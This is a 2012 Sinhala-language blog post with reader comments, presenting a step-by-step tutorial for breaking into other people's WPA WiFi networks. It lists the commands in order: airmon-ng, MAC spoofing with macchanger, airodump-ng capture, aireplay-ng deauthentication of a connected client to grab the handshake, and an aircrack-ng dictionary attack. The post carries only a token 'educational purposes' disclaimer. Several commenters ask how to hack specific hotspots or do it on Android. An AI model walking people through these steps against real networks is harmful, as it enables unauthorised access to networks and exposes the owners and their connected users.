සයිබර් ආරක්ෂාව තේරෙන සිංහලෙන්

Tuesday 7 August 2012

Hack WiFi - වයිෆයි හැක් කරමු

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.
වයිෆයි  (WiFi) ගැන ඔයාලා දන්නවනේ නේද?  WiFi කියන්නෙ වයර් රහිතව කරන සංන්නිවේදන කටයුත්තකට. ( Wireless Fidelity, wireless internet) ඉතින් මේ ආකාරයට  වයර් රහිතව  සංන්නිවේදන කටයුතු කරන්නේ පහසුවට.  වයර්  එක්ක වැඩ කරන්න අපහසු හින්දා. ඉතින් ඒ ආකාරයට වැඩකරන ස්තානයකට අපි කියනවා WiFi Hotspot එකක් කියලා.  WiFi Hotspot එකක වෙබ් අඩවි තහනම් කිරීමක් බාගන්න තියන වේගය අඩාල කිරීමක් වගේ දේවල් සිද්දවෙන්නෙ නේ. ඒ කියන්නෙ  WiFi Hotspot  එකකදී අන්තර්ජාලය පුල් නිදහස් කියන එක.  ඉතින් මේ  WiFi Hotspot  ජාලකරන තලමිතීන් අනුව ආරක්ශිතව හදලයි තියෙන්නේ. ඒ කියන්නෙ මුරපද දාල වගේ.  ඉතින් අද කියන්න යන්නේ කොහොමද මේ මුරපද බිදගෙන  WiFi Hotspot  එකක් ඇතුලට යන්නෙ කියලා

මේ වැඩේ කරන්න පහල දේවල් ඕනේ

1. Linux Backtrack 5 RC2 ( ඔයාල භාවිතා කරන පරිගනකයේ ඕස් එකට අදාල වර්ශන් එක බාගන්න)
2 හොදට වැඩ කරන wireless කාඩ් එකක්
3. දැනට බාවිතා වෙන පාස්වර්ඩ් ලිස්ට් එකක්. මේක නම් ගූගල් වලින් හොයාගන්න පුලුවන්. ටිකක් කම්මැලි නම් මෙන්න තියනවා පාස්වර්ඩ් 1717681 ම. 



ඉතින් Linux Backtrack 5 RC මෙතනින් බාගන්න.

හරි, මන් හිතන්නේ ඔයාලා දැන් Linux Backtrack 5 RC2 බාගෙන සීඩී එකකට ගහගෙන එහෙම ඇති කියලා. ඊලගට පරිගනකය ඒ සීඩී එකෙන් බූට් කරන්න. ලිනක්ස් ගැන ටිකක් දැනගෙන ඉන්න නම් ඕනේ. කමක් නෑ දන්නේ නැත්නම් මං ස්ක්‍රීන් සොට්ස් ටිකක් දාන්නම්.

පලමු පියවර 

මුලින්ම root@bt:~# කියන තැනට airmon-ng කියන විදානය බාවිතා කලාම ඉහල රූපයේ ආකාරයට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා 

මෙතන පෙන්නන wlan0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට හැමදේම කියන්නෙ. ඉතින් ඔයාලා wlan0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම 

දෙවන පියවර 

airmon-ng start wlan0 කියන විදානය ලබා දෙන්න. මේකෙන් අපි බලන්නේ අපිට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එක ක්‍රියාකාරී තත්වයෙන් තියනවද කියල.

තුන්වන පියවර 
මෙතනදි අපි ifconfig කියන විදානය ලබා දෙනවා. එතනදි අපිට පහල ආකාරයට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ තොරතුරු බලගන්න පුලුවන්.


හතරවන පියවර 
මෙතනදි කරන්න බලපොරොත්තු වෙන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න. පහල විදානය බාවිතා කරන්න.
macchanger –m 00:11:22:33:44:55 wlan0

පස්වන පියවර 
මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද කියන එක බලන එක. ඒකට පහත විදානය බාවිත කරන්න පුලුවන්. 
airodump-ng mon0
හයවන පියවර 
ඊලගට අපිට බලගන්න පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම. SSID එක. රතුපාටින් දාල තියෙන්නෙ ඒක. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. ඒකට පහල විදානය දෙන්න. 
airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

 කොල පාටින් තියෙන්නෙ ඒ වගෙ ලොග් වෙලා ඉන්න කෙනෙක්ගේ මැක් එකක්. 

හත්වන පියවර 
ඊලගට කරන්න ඕනේ දැනට ලොග්වෙල ඉන්න කෙනා එක්ක පොඩි handshake දාගන්න  ඒකට පහල විදානය දෙන්න. 
aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

මේ විදානය දුන්නට පස්සෙ ඉහල රූපයේ පෙනෙන ආකරයට විදානයන් ක්‍රියත්මක වෙයි.

අටවන පියවර 
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න  WiFi නෙට්වර්ක් එකේ  පාස්කී එක ලබා ගන්න.  ඒකට පහල විදානය දෙන්න. 

aircrack-ng crackwpa-01.cap –w list


මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත්  එක දෙන්න ඕනේ. 
ඉතින් ඔන්න කොල පාටින් දක්වලා තියන ආකාරයට අපිට හැක් කරන්න ඕනේ  WiFi නෙට්වර්ක් එකේ  පාස්කී එක පෙන්නනවා. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න 


Share:

17 comments:

Anonymous said...

Linux Backtrack 5 RC
download link 1ka wada na ne

Admin -Help IT Lanka said...

http://www.backtrack-linux.org/downloads
mekai link eka. wada karanawa yaluwa..

Anonymous said...

mcn mekedi dialog wifi hotspot ekath hack karanna puluwanda?

Anonymous said...

ane me download link eka vada naneee hari eka dannakooo

Anonymous said...

list kiana thanata password wala path eka denne kohomada?

කැප්ටන් ජැක් ස්පැරෝ said...

me vidihatama android valadi wifi hack karanna puluvanda???????

ikman.com said...

මේක මම ට්‍රයි කරන්නද?? ෂුවර් නේද මේක/?

Unknown said...

superb:D

Anonymous said...

"list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ"
meka kohomada karanne???

suneth said...

download link 1 aul ne

suneth said...

download link 1 aul ne

Anonymous said...

Machan meka dld kalama enne rar file ekkne..eka kohmada cd ekata gahanne bootable wdhta..plz help....

Anonymous said...

Meka dala boot karddi boot kil wtena thnata awma enter kalama list ekakne pennanne ..eken mkadda select krnne? plz help..

Anonymous said...

list kiana thanata password wala path eka denne kohomada?

RoBlogger said...

ane man meka hoya hoya hitiye. mata wifi network ekakwath pennannene. 7k thiyenawa.

elearnhacker said...

meke tiyana link eken gihin download kara ganna http://goo.gl/S5ITeX

backtrack dan download den na eyalage site eken outdated handa

misery said...

මේක අන්ඩ‍්‍රොයිඩ්වලින් කරන්නවිදියක් නැද්ද

Social Media

About Author



Eranda Dayawansa
Founder and Editor-in-Chief of 'Cyber Security'. Microsoft Certified ICT Instructor, Cyber Security Analyst, Information Security Researcher

Blog Archive

About

Followers

Blog Archive